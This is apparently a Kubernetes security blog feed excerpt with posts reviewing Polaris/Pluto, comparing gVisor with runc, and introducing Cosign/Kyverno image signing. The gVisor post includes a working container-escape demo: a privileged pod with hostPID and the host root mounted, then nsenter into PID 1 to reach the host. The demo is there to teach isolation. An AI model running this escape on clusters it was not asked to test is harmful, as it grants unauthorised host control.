<h3 id="heading-install-pluto-on-linux-arm64">Install Pluto on Linux (ARM64)</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># 1. Download the ARM64 binary</span>
wget https://github.com/FairwindsOps/pluto/releases/download/v5.22.6/pluto_5.22.6_linux_arm64.tar.gz

<span class="hljs-comment"># 2. Extract the archive</span>
tar -xvf pluto_5.22.6_linux_arm64.tar.gz

<span class="hljs-comment"># 3. Make it executable</span>
chmod +x pluto

<span class="hljs-comment"># 4. Verify</span>
./pluto version
</code></pre>
<p>You should see something like:</p>
<pre><code>Version:<span class="hljs-number">5.22</span><span class="hljs-number">.6</span> Commit:<span class="hljs-number">27</span>a470e10b07302fba2d5a2e6817a08a2b87c0c3
</code></pre><h3 id="heading-test-pluto-using-a-deprecated-api-flowschema-v1beta3">Test Pluto Using a Deprecated API (FlowSchema v1beta3)</h3>
<p>Save this as <strong><code>fc.yaml</code></strong>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">flowcontrol.apiserver.k8s.io/v1beta3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">FlowSchema</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">deprecated-flowschema</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">priorityLevelConfiguration:</span>
    <span class="hljs-attr">name:</span> <span class="hljs-string">workload-high</span>
  <span class="hljs-attr">matchingPrecedence:</span> <span class="hljs-number">1000</span>
  <span class="hljs-attr">distinguisherMethod:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">ByUser</span>
  <span class="hljs-attr">rules:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">subjects:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">User</span>
      <span class="hljs-attr">user:</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">system:serviceaccount:default:default</span>
    <span class="hljs-attr">resourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">verbs:</span> [<span class="hljs-string">"*"</span>]
      <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">"*"</span>]
      <span class="hljs-attr">resources:</span> [<span class="hljs-string">"*"</span>]
    <span class="hljs-attr">nonResourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">verbs:</span> [<span class="hljs-string">"*"</span>]
      <span class="hljs-attr">nonResourceURLs:</span> [<span class="hljs-string">"*"</span>]
</code></pre>
<p>Running Pluto against the file, you’ll see a deprecation warning.</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ ./pluto detect-files -f fc.yaml
NAME                    KIND         VERSION                                REPLACEMENT                       REMOVED   DEPRECATED   REPL AVAIL
deprecated-flowschema   FlowSchema   flowcontrol.apiserver.k8s.io/v1beta3   flowcontrol.apiserver.k8s.io/v1   <span class="hljs-literal">false</span>     <span class="hljs-literal">true</span>         <span class="hljs-literal">false</span>
</code></pre>
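<p>By default, Pluto judges deprecations against its built-in data. You can also pin the comparison to the Kubernetes version you're upgrading to. A hedged sketch (the <code>--target-versions</code> flag and its <code>k8s=</code> syntax come from Pluto's docs — double-check on your release):</p>

```bash
# Report findings relative to a planned 1.29 upgrade
./pluto detect-files -f fc.yaml --target-versions k8s=v1.29.0
```

This is handy in CI, where "removed in the version we're about to run" matters more than "deprecated somewhere, someday."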
<h3 id="heading-pluto-in-your-running-cluster">Pluto in your running cluster</h3>
<p>Pluto can also be run against your live cluster. While this is useful for older cluster versions, against a 1.33 cluster you shouldn't see anything.</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl version
Client Version: v1.33.6
Kustomize Version: v5.6.0
Server Version: v1.33.6
matt@cp:~/fairwinds/polaris$ ./pluto detect-all-in-cluster -o wide 2&gt;/dev/null
There were no resources found with known deprecated apiVersions.
</code></pre>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>If you’ve made it this far, I commend you. Writing this post felt a bit like sitting five minutes into a panel interview and realizing this isn’t the right candidate, but you still push through out of courtesy.</p>
<p>Polaris is a lightweight posture tool that offers a very surface-level read on workload quality. The dashboard looks fine but doesn’t tell you much, the admission controller functions but provides almost no visibility, and the CLI has pockets of usefulness if you really need a YAML linter with opinions. Furthermore, there isn't really a clear standard it is being evaluated against. Is this compliance, best practice, or something else?</p>
<p>But the reality is simple: there isn’t much here that provides meaningful or lasting value. It’s not deep, it’s not insightful, and it’s not something I’d recommend beyond casual curiosity.</p>
]]></content:encoded></item><item><title><![CDATA[Bubble Wrap for Containers]]></title><description><![CDATA[Kubernetes makes it easy to forget what’s really running underneath. You write a Deployment, set a few limits, and let the control plane take it from there. But once that Pod lands on a node, it’s no longer YAML — it’s syscalls hitting the kernel.
Co...]]></description><link>https://cloudsecburrito.com/bubble-wrap-for-containers</link><guid isPermaLink="true">https://cloudsecburrito.com/bubble-wrap-for-containers</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[Linux]]></category><category><![CDATA[runc]]></category><category><![CDATA[gVisor]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Sun, 23 Nov 2025 21:14:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1763932248575/78952988-55d5-49bf-8b8f-a880e3b89032.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes makes it easy to forget what’s really running underneath. You write a Deployment, set a few limits, and let the control plane take it from there. But once that Pod lands on a node, it’s no longer YAML — it’s syscalls hitting the kernel.</p>
<p>Containers aren’t magic sandboxes; they’re just processes sharing the same kernel with a light dusting of isolation. That’s fine for speed, but it’s also why “container escapes” can show up (yes, back to my container escape obsession). They’re not exploits so much as reminders that namespaces aren’t armor.</p>
<p>Enter gVisor, Google’s user-space kernel that intercepts syscalls before they ever reach the host. Instead of trusting the Linux kernel to stay polite, gVisor runs your workload inside its own miniature kernel, enforcing isolation at the syscall boundary.</p>
<p>It sits somewhere between <code>runc</code> and a full-blown VM: fast enough to stay in the Kubernetes loop, but restrictive enough to squash most escape paths.</p>
<p>gVisor isn’t new, but it’s worth a <em>burrito</em> look—what it takes to install, where it shines, where it hurts, and why your favorite <code>nsenter</code> trick suddenly stops working.</p>
<hr />
<h2 id="heading-installing-gvisor-on-ubuntu-arm">Installing gVisor on Ubuntu (ARM)</h2>
<p>I’m running this on my usual Mac setup: an Ubuntu ARM VM (Apple Silicon under the hood) with a kubeadm cluster using <code>containerd</code> as the runtime. Running something else should be fairly similar.</p>
<p>The plan:</p>
<ol>
<li>Install the gVisor binaries (<code>runsc</code> and the containerd shim).</li>
<li>Tell <code>containerd</code> about the new runtime.</li>
<li>Restart <code>containerd</code> and sanity-check.</li>
</ol>
<p>Do this on <strong>every node</strong> that will run gVisor-protected workloads.</p>
<h3 id="heading-0-quick-sanity-checks">0. Quick sanity checks</h3>
<p>Make sure you’re on ARM64 and using containerd:</p>
<pre><code class="lang-bash">uname -m
containerd --version
</code></pre>
<h3 id="heading-1-install-the-gvisor-binaries">1. Install the gVisor binaries</h3>
<pre><code class="lang-bash">curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor.gpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">"deb [signed-by=/usr/share/keyrings/gvisor.gpg] https://storage.googleapis.com/gvisor/releases release main"</span> | sudo tee /etc/apt/sources.list.d/gvisor.list
sudo apt update
sudo apt install -y runsc gvisor-containerd-shim
</code></pre>
<p>Validate:</p>
<pre><code class="lang-bash">runsc --version
</code></pre>
<h3 id="heading-2-wire-gvisor-into-containerd">2. Wire gVisor into containerd</h3>
<p>Write a minimal <code>config.toml</code> (note: the heredoc below overwrites any existing file, so merge by hand if you’ve already customized containerd):</p>
<pre><code class="lang-bash">cat &lt;&lt;EOF | sudo tee /etc/containerd/config.toml
version = 2
[plugins.<span class="hljs-string">"io.containerd.runtime.v1.linux"</span>]
  shim_debug = <span class="hljs-literal">true</span>
[plugins.<span class="hljs-string">"io.containerd.grpc.v1.cri"</span>.containerd.runtimes.runc]
  runtime_type = <span class="hljs-string">"io.containerd.runc.v2"</span>
[plugins.<span class="hljs-string">"io.containerd.grpc.v1.cri"</span>.containerd.runtimes.runsc]
  runtime_type = <span class="hljs-string">"io.containerd.runsc.v1"</span>
EOF
</code></pre>
<p>Restart containerd:</p>
<pre><code class="lang-bash">sudo systemctl restart containerd
</code></pre>
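<p>Before moving on, it's worth confirming containerd actually registered the new runtime. A hedged sketch (the output shape varies by containerd/crictl version):</p>

```bash
# The merged config should include the runsc runtime handler
sudo containerd config dump | grep -A 1 'runtimes.runsc'

# crictl's status dump includes the CRI runtime table as well
sudo crictl info | grep -i runsc
```

If neither shows <code>runsc</code>, the RuntimeClass step later will fail with pods stuck in ContainerCreating.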
<hr />
<h2 id="heading-running-kubernetes-pods-with-gvisor">Running Kubernetes Pods with gVisor</h2>
<p>Start by creating a <code>RuntimeClass</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">node.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">RuntimeClass</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor</span>
<span class="hljs-attr">handler:</span> <span class="hljs-string">runsc</span>
</code></pre>
<p>Apply:</p>
<pre><code class="lang-bash">kubectl apply -f runtimeclass-gvisor.yaml
</code></pre>
<p>Now run a test pod:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor-test</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">runtimeClassName:</span> <span class="hljs-string">gvisor</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ubuntu</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 36000"</span>]
</code></pre>
<p>Apply and verify:</p>
<pre><code class="lang-bash">kubectl apply -f gvisor-test.yaml
kubectl get pod
</code></pre>
<p>Get the container ID and confirm it’s using gVisor:</p>
<pre><code class="lang-bash">CID=$(kubectl get pod gvisor-test -o jsonpath=<span class="hljs-string">'{.status.containerStatuses[0].containerID}'</span> | sed <span class="hljs-string">'s#containerd://##'</span>)
sudo runsc --root /run/containerd/runsc/k8s.io list | grep <span class="hljs-variable">$CID</span>
</code></pre>
<hr />
<h2 id="heading-gvisor-vs-runc-deep-dive">gVisor vs runc Deep Dive</h2>
<p>Instead of starting with theory, we’re going to follow the Burrito Way™: look at what actually happens first, then decide what we think. Two Ubuntu containers, same image, same command, same cluster:</p>
<ul>
<li>one using <code>runc</code></li>
<li>one using <code>runsc</code></li>
</ul>
<p>The differences show you far more about gVisor’s philosophy than any diagram.</p>
<p>Each section includes:</p>
<ul>
<li>test commands  </li>
<li>what you should observe  </li>
<li>and what it actually means  </li>
</ul>
<h3 id="heading-test-setup-ubuntu-pods-gvisor-vs-runc">Test Setup: Ubuntu Pods (gVisor vs runc)</h3>
<h3 id="heading-baseline-runc">Baseline (runc)</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">nogvisor-test</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ubuntu</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"/bin/bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
</code></pre>
<h3 id="heading-gvisor">gVisor</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor-test</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">runtimeClassName:</span> <span class="hljs-string">gvisor</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ubuntu</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"/bin/bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
</code></pre>
<hr />
<h2 id="heading-process-visibility-inside-the-container">Process Visibility (Inside the Container)</h2>
<h3 id="heading-commands">Commands</h3>
<p><strong>runc</strong></p>
<pre><code class="lang-bash">kubectl <span class="hljs-built_in">exec</span> -it nogvisor-test -- bash
ps aux
</code></pre>
<p><strong>gVisor</strong></p>
<pre><code class="lang-bash">kubectl <span class="hljs-built_in">exec</span> -it gvisor-test -- bash
ps aux
</code></pre>
<h3 id="heading-expected">Expected</h3>
<ul>
<li>runc: PID 1 (<code>sleep</code>), bash, ps  </li>
<li>gVisor: PID 1 (<code>sleep</code>), bash, ps  </li>
<li>TTY differs:  <ul>
<li>runc → <code>pts/0</code>  </li>
<li>gVisor → <code>?</code></li>
</ul>
</li>
</ul>
<h3 id="heading-assessment">Assessment</h3>
<p>Inside the container, gVisor looks almost identical to runc. PID namespaces behave the same. That’s the trick: <strong>gVisor changes the kernel boundary, not the container environment.</strong> From the inside, nothing looks strange.</p>
<hr />
<h2 id="heading-process-visibility-from-the-host">Process Visibility (From the Host)</h2>
<h3 id="heading-commands-1">Commands</h3>
<p><strong>Check for runc container process:</strong></p>
<pre><code class="lang-bash">ps aux | grep sleep
</code></pre>
<p><strong>Check for gVisor process wrappers:</strong></p>
<pre><code class="lang-bash">ps aux | grep runsc
</code></pre>
<h3 id="heading-expected-1">Expected</h3>
<ul>
<li>runc: host sees <code>sleep 3600</code> as a real process  </li>
<li>gVisor: host sees <code>runsc-sandbox</code>, <code>runsc-gofer</code>, etc.</li>
</ul>
<h3 id="heading-assessment-1">Assessment</h3>
<p>This is where the façade cracks. With runc, containers are <em>just host processes</em>. With gVisor, your workload runs <strong>inside a userspace kernel</strong>, not directly on the host. This is the clearest indicator that gVisor is more than “runc but safer.”</p>
<hr />
<h2 id="heading-tty-behavior">TTY Behavior</h2>
<h3 id="heading-command">Command</h3>
<pre><code class="lang-bash">ps aux
</code></pre>
<h3 id="heading-expected-2">Expected</h3>
<ul>
<li>runc: <code>TTY = pts/0</code>  </li>
<li>gVisor: <code>TTY = ?</code></li>
</ul>
<h3 id="heading-assessment-2">Assessment</h3>
<p>TTYs behave differently because gVisor doesn’t map container PTYs to real host pseudo-terminals. You’re talking to a virtualized console layer.</p>
<hr />
<h2 id="heading-proc-virtualization">/proc Virtualization</h2>
<h3 id="heading-commands-2">Commands</h3>
<pre><code class="lang-bash">cat /proc/modules | grep tcp_diag
</code></pre>
<h3 id="heading-expected-3">Expected</h3>
<ul>
<li>runc: shows real kernel modules (matching host)</li>
<li>gVisor: empty or missing</li>
</ul>
<h3 id="heading-assessment-3">Assessment</h3>
<p>Under gVisor, <code>/proc</code> is synthetic. <code>runsc</code> generates a fake procfs, so nothing from the real kernel leaks through. Kernel modules, device info, and other structural details disappear entirely. This is strong proof that syscalls never reach the kernel directly.</p>
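<p>Another quick tell is the kernel version string itself. A hedged sketch (the exact value gVisor reports depends on the runsc release — historically the Sentry has advertised a fixed, older kernel version rather than the host's):</p>

```bash
# runc pod: matches the node's real kernel
kubectl exec nogvisor-test -- uname -r

# gVisor pod: reports the Sentry's emulated kernel version,
# regardless of what the host is actually running
kubectl exec gvisor-test -- uname -r
```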
<h2 id="heading-capabilities">Capabilities</h2>
<h3 id="heading-command-1">Command</h3>
<pre><code class="lang-bash">grep Cap /proc/self/status
</code></pre>
<h3 id="heading-expected-4">Expected</h3>
<p>runc:</p>
<pre><code>CapEff: <span class="hljs-number">00000000</span>a80425fb
</code></pre><p>gVisor:</p>
<pre><code>CapEff: <span class="hljs-number">00000000</span>a80405fb
</code></pre><h3 id="heading-assessment-4">Assessment</h3>
<p>The masks <em>look</em> nearly identical, but they don’t mean the same thing.</p>
<ul>
<li>In <strong>runc</strong>, capability bits map to real (namespaced) kernel capabilities.</li>
<li>In <strong>gVisor</strong>, the bits are <strong>synthetic values</strong> exposed by <code>runsc</code> so applications don't break.</li>
</ul>
<p>Even if CAP_SYS_ADMIN shows up in the mask, the underlying syscalls never reach the host.<br />The permissions appear real, but the power behind them isn’t.</p>
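<p>You can isolate exactly which bit differs with a little shell arithmetic. The masks are the ones captured above; capability numbering follows the kernel's list, where bit 13 is CAP_NET_RAW — which lines up with gVisor disabling raw sockets by default (its <code>--net-raw</code> flag turns them back on):</p>

```shell
# XOR the two effective-capability masks to find the differing bit
runc_caps=0xa80425fb
gvisor_caps=0xa80405fb
printf 'diff mask: %x\n' $(( runc_caps ^ gvisor_caps ))   # diff mask: 2000
# 0x2000 = 1 << 13, i.e. capability 13 (CAP_NET_RAW)
```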
<hr />
<h2 id="heading-syscall-behavior-strace">Syscall Behavior (strace)</h2>
<blockquote>
<p>Note: you need to install <code>strace</code> inside the container.</p>
</blockquote>
<h3 id="heading-commands-3">Commands</h3>
<pre><code class="lang-bash">apt update &amp;&amp; apt install -y strace
strace ls
</code></pre>
<h3 id="heading-expected-5">Expected</h3>
<ul>
<li><strong>runc:</strong>  <pre><code>execve(<span class="hljs-string">"/usr/bin/ls"</span>, [<span class="hljs-string">"ls"</span>], ...)
</code></pre></li>
<li><strong>gVisor:</strong>  <pre><code>execve(<span class="hljs-number">0xffffffffffffffda</span>, [<span class="hljs-string">"ls"</span>], ...)
</code></pre></li>
</ul>
<h3 id="heading-assessment-5">Assessment</h3>
<p>On the host and in runc, <code>execve</code> shows a <strong>real path</strong> because the syscall goes directly into the host kernel.</p>
<p>gVisor shows a <strong>sentinel hex value</strong> instead of a path. That’s runsc intercepting the syscall before it reaches the kernel. The rest of the call trace often looks similar because gVisor emulates most of Linux’s syscall surface — but it’s emulation, not the real thing.</p>
<hr />
<h2 id="heading-filesystem-amp-mount-behavior">Filesystem &amp; Mount Behavior</h2>
<h3 id="heading-commands-4">Commands</h3>
<pre><code class="lang-bash">mount -t proc proc /mnt
touch /proc/sys/kernel/randomize_va_space
</code></pre>
<h3 id="heading-expected-6">Expected</h3>
<ul>
<li><strong>runc:</strong>  <pre><code>mount: /mnt: cannot mount proc read-only.
</code></pre></li>
<li><strong>gVisor:</strong>  <pre><code>mount: /mnt: permission denied.
</code></pre></li>
</ul>
<h3 id="heading-assessment-6">Assessment</h3>
<p>Both runtimes reject the mount, but for <strong>completely different reasons</strong>:</p>
<ul>
<li>In runc, the real kernel enforces container restrictions (read-only proc, etc.).</li>
<li>In gVisor, <strong>runsc denies the syscall immediately</strong>, before the kernel even sees it.</li>
</ul>
<p>This highlights the fundamental boundary difference:<br />runc relies on the kernel’s own namespace model, while gVisor implements mount and filesystem semantics in userspace.</p>
<hr />
<h2 id="heading-simulating-a-classic-container-escape-runc-vs-gvisor">Simulating a Classic Container Escape (runc vs gVisor)</h2>
<p>This is the last container escape demo. (Until the next one.)</p>
<h3 id="heading-runc-escape-ubuntu-node">runc Escape (Ubuntu Node)</h3>
<p>Save as <code>escape.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">escape</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostPID:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nicolaka/netshoot:latest</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"3600"</span>]
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
      <span class="hljs-attr">volumeMounts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
          <span class="hljs-attr">mountPath:</span> <span class="hljs-string">/host</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
        <span class="hljs-attr">type:</span> <span class="hljs-string">Directory</span>
  <span class="hljs-attr">restartPolicy:</span> <span class="hljs-string">Never</span>
</code></pre>
<p>Apply and exec:</p>
<pre><code class="lang-bash">kubectl apply -f escape.yaml
kubectl <span class="hljs-built_in">exec</span> -it escape -- bash
</code></pre>
<p>Escape to the host:</p>
<pre><code class="lang-bash">nsenter --target 1 --mount --uts --ipc --net --pid
</code></pre>
<p>You now land directly on the host:</p>
<pre><code class="lang-bash">uname
whoami
cat /etc/os-release
</code></pre>
<h3 id="heading-trying-the-same-escape-under-gvisor">Trying the Same Escape Under gVisor</h3>
<p>Now use an equivalent pod spec (swapping in a stock Ubuntu image this time), but with gVisor:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">gvisor-escape</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">gvisor-escape</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostPID:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">runtimeClassName:</span> <span class="hljs-string">gvisor</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu:22.04</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"/bin/bash"</span>, <span class="hljs-string">"-c"</span>, <span class="hljs-string">"sleep 3600"</span>]
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
      <span class="hljs-attr">volumeMounts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
          <span class="hljs-attr">mountPath:</span> <span class="hljs-string">/host</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
        <span class="hljs-attr">type:</span> <span class="hljs-string">Directory</span>
  <span class="hljs-attr">restartPolicy:</span> <span class="hljs-string">Never</span>
</code></pre>
<p>Exec in:</p>
<pre><code class="lang-bash">kubectl <span class="hljs-built_in">exec</span> -it gvisor-escape -- bash
ps aux
</code></pre>
<p>PID 1 here is just the <code>/pause</code> infrastructure container.</p>
<p>Attempt the escape:</p>
<pre><code class="lang-bash">nsenter --target 1 --mount --uts --ipc --net --pid
<span class="hljs-comment"># nsenter: failed to execute /bin/sh: No such file or directory</span>
</code></pre>
<p>This drops you into the infra container’s namespaces — <strong>not the host</strong> — and the infra container has no shell.<br />Trying to pivot to your own namespace:</p>
<pre><code class="lang-bash">nsenter --target 3 --mount --uts --ipc --net --pid -- ls /
<span class="hljs-comment"># works, but just shows your same container root</span>

nsenter --target 3 --mount --uts --ipc --net --pid
<span class="hljs-comment"># no visible change — you're already there</span>
</code></pre>
<p>Nothing interesting happens because:</p>
<ul>
<li>gVisor mediates all namespaces  </li>
<li><code>/proc</code> is virtualized  </li>
<li>escape pivots that rely on host namespaces simply don’t exist  </li>
</ul>
<p><strong>Same YAML. Very different outcome.<br />runc → host access.<br />gVisor → sandbox stays a sandbox.</strong></p>
<hr />
<h2 id="heading-wrapping-up">Wrapping Up</h2>
<p>Kubernetes makes containers feel tidy and predictable. YAML goes in, Pods come out, and somewhere in between the scheduler pretends it’s your friend. But once a container starts running, every security guarantee boils down to one question:</p>
<p><strong>Who actually handles your syscalls?</strong></p>
<ul>
<li><p>With <strong>runc</strong>, the answer is: <em>the host kernel</em>.<br />Great for performance, great for density, and great for escape demos.</p>
</li>
<li><p>With <strong>gVisor</strong>, the answer becomes: <em>a userspace kernel you don’t control from inside the container</em>.<br />Syscalls stop inside runsc, <code>/proc</code> becomes synthetic, capabilities lose their teeth, mounts break differently, and classic escape tricks like <code>nsenter --target 1</code> simply stop working because the host kernel never sees the request.</p>
</li>
</ul>
<p>That’s the gVisor mindset:  <strong>keep Kubernetes fast, but stop trusting the kernel as a security boundary.</strong></p>
<p>Is gVisor a silver bullet?  No.  But it genuinely changes the attack surface without requiring VMs or a massive architectural overhaul. That makes it worth understanding.</p>
<p>I’ll revisit this later to look at additional examples (and the very real performance hit), but that’s it for now.</p>
]]></content:encoded></item><item><title><![CDATA[Signed, Sealed, and Admitted]]></title><description><![CDATA[Kubernetes does a lot of things automatically — scheduling, networking, scaling. But trust isn’t one of them. If someone pushes an image to a registry with your project’s name on it, Kubernetes won’t ask questions. It’ll just pull and run.
Of course,...]]></description><link>https://cloudsecburrito.com/signed-sealed-and-admitted</link><guid isPermaLink="true">https://cloudsecburrito.com/signed-sealed-and-admitted</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[kyverno]]></category><category><![CDATA[cosign]]></category><category><![CDATA[Security]]></category><category><![CDATA[admission controller]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 05 Nov 2025 20:46:58 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762375301183/8d729ce7-8687-4917-8248-35601730ba75.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes does a lot of things automatically — scheduling, networking, scaling. But trust isn’t one of them. If someone pushes an image to a registry with your project’s name on it, Kubernetes won’t ask questions. It’ll just pull and run.</p>
<p>Of course, that’s not exactly ideal. A single problematic image can skip right past scanning gates and land in production because the cluster never checked where it came from.</p>
<p>Fortunately, there’s an easy way to fix that: <strong>image signing</strong>.</p>
<p>Image signing proves who built an image and that it hasn’t changed since. <a target="_blank" href="https://github.com/sigstore/cosign">Cosign</a> (part of the Sigstore project) handles the signing and verification piece, giving your container images a verifiable identity. <strong>Kyverno</strong>, meanwhile, enforces that trust boundary inside the cluster — it can block any workload whose image isn’t signed by a trusted key.</p>
<p>In this post, we’ll:</p>
<ul>
<li>Use <strong>Cosign</strong> to sign and verify a container image manually.  </li>
<li>Create a <strong>Kyverno</strong> policy that rejects unsigned workloads.  </li>
<li>Add a tiny <strong>GitHub Action</strong> so every new build is automatically signed before deployment.  </li>
</ul>
<p>No lengthy PKI setup — just practical, auditable trust you can drop into any Kubernetes cluster today.</p>
<hr />
<h2 id="heading-why-image-signing-matters">Why Image Signing Matters</h2>
<p>Let's run through a very simple example of why you might care about this whole signing thing.</p>
<p>Say you’ve got a clean build pipeline. Your team pushes to <code>ghcr.io/company/backend:latest</code> and Kubernetes pulls it straight into production. Everyone trusts that tag.</p>
<p>Then one day you spin up a fork, test a quick change, and push it back to the same tag. Oops. The registry accepts it. The cluster redeploys automatically. Now the cluster is running this somewhat mysterious thing.</p>
<p>Nothing malicious happened. There was no exploit, no compromised credential—just an overly trusted tag and a missing signature.</p>
<p>That’s what image signing solves. Instead of trusting that “latest” means yours, you trust that it’s signed by someone you actually know. <strong>Cosign</strong> adds that proof. <strong>Kyverno</strong> enforces it before anything runs.</p>
<p>Before we dive in, you can see this in action with a public example. Chainguard maintains a registry called <strong>cgr.dev</strong>, which hosts signed, minimal container images. Every image there—like <code>cgr.dev/chainguard/nginx</code>—is verifiable using Cosign and Sigstore’s transparency log.</p>
<p>Running a basic check with OIDC (don't worry, we'll get to setting this all up soon):</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cosign verify \
  --certificate-identity-regexp <span class="hljs-string">"https://github.com/chainguard-images/images/.*"</span> \
  --certificate-oidc-issuer <span class="hljs-string">"https://token.actions.githubusercontent.com"</span> \
  cgr.dev/chainguard/nginx

Verification <span class="hljs-keyword">for</span> cgr.dev/chainguard/nginx:latest --
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - Existence of the claims <span class="hljs-keyword">in</span> the transparency <span class="hljs-built_in">log</span> was verified offline
  - The code-signing certificate was verified using trusted certificate authority certificates
</code></pre>
<p>You’ll see Cosign validate the signature and confirm it was signed through GitHub’s OIDC workflow. That’s what we’re building toward: verifiable image trust that proves where your workloads come from.</p>
<hr />
<h2 id="heading-setup-cosign">Setup Cosign</h2>
<p>Before we sign anything, we need to make sure <strong>Cosign</strong> is installed and working locally.</p>
<h3 id="heading-install-cosign-on-macos">Install Cosign on macOS</h3>
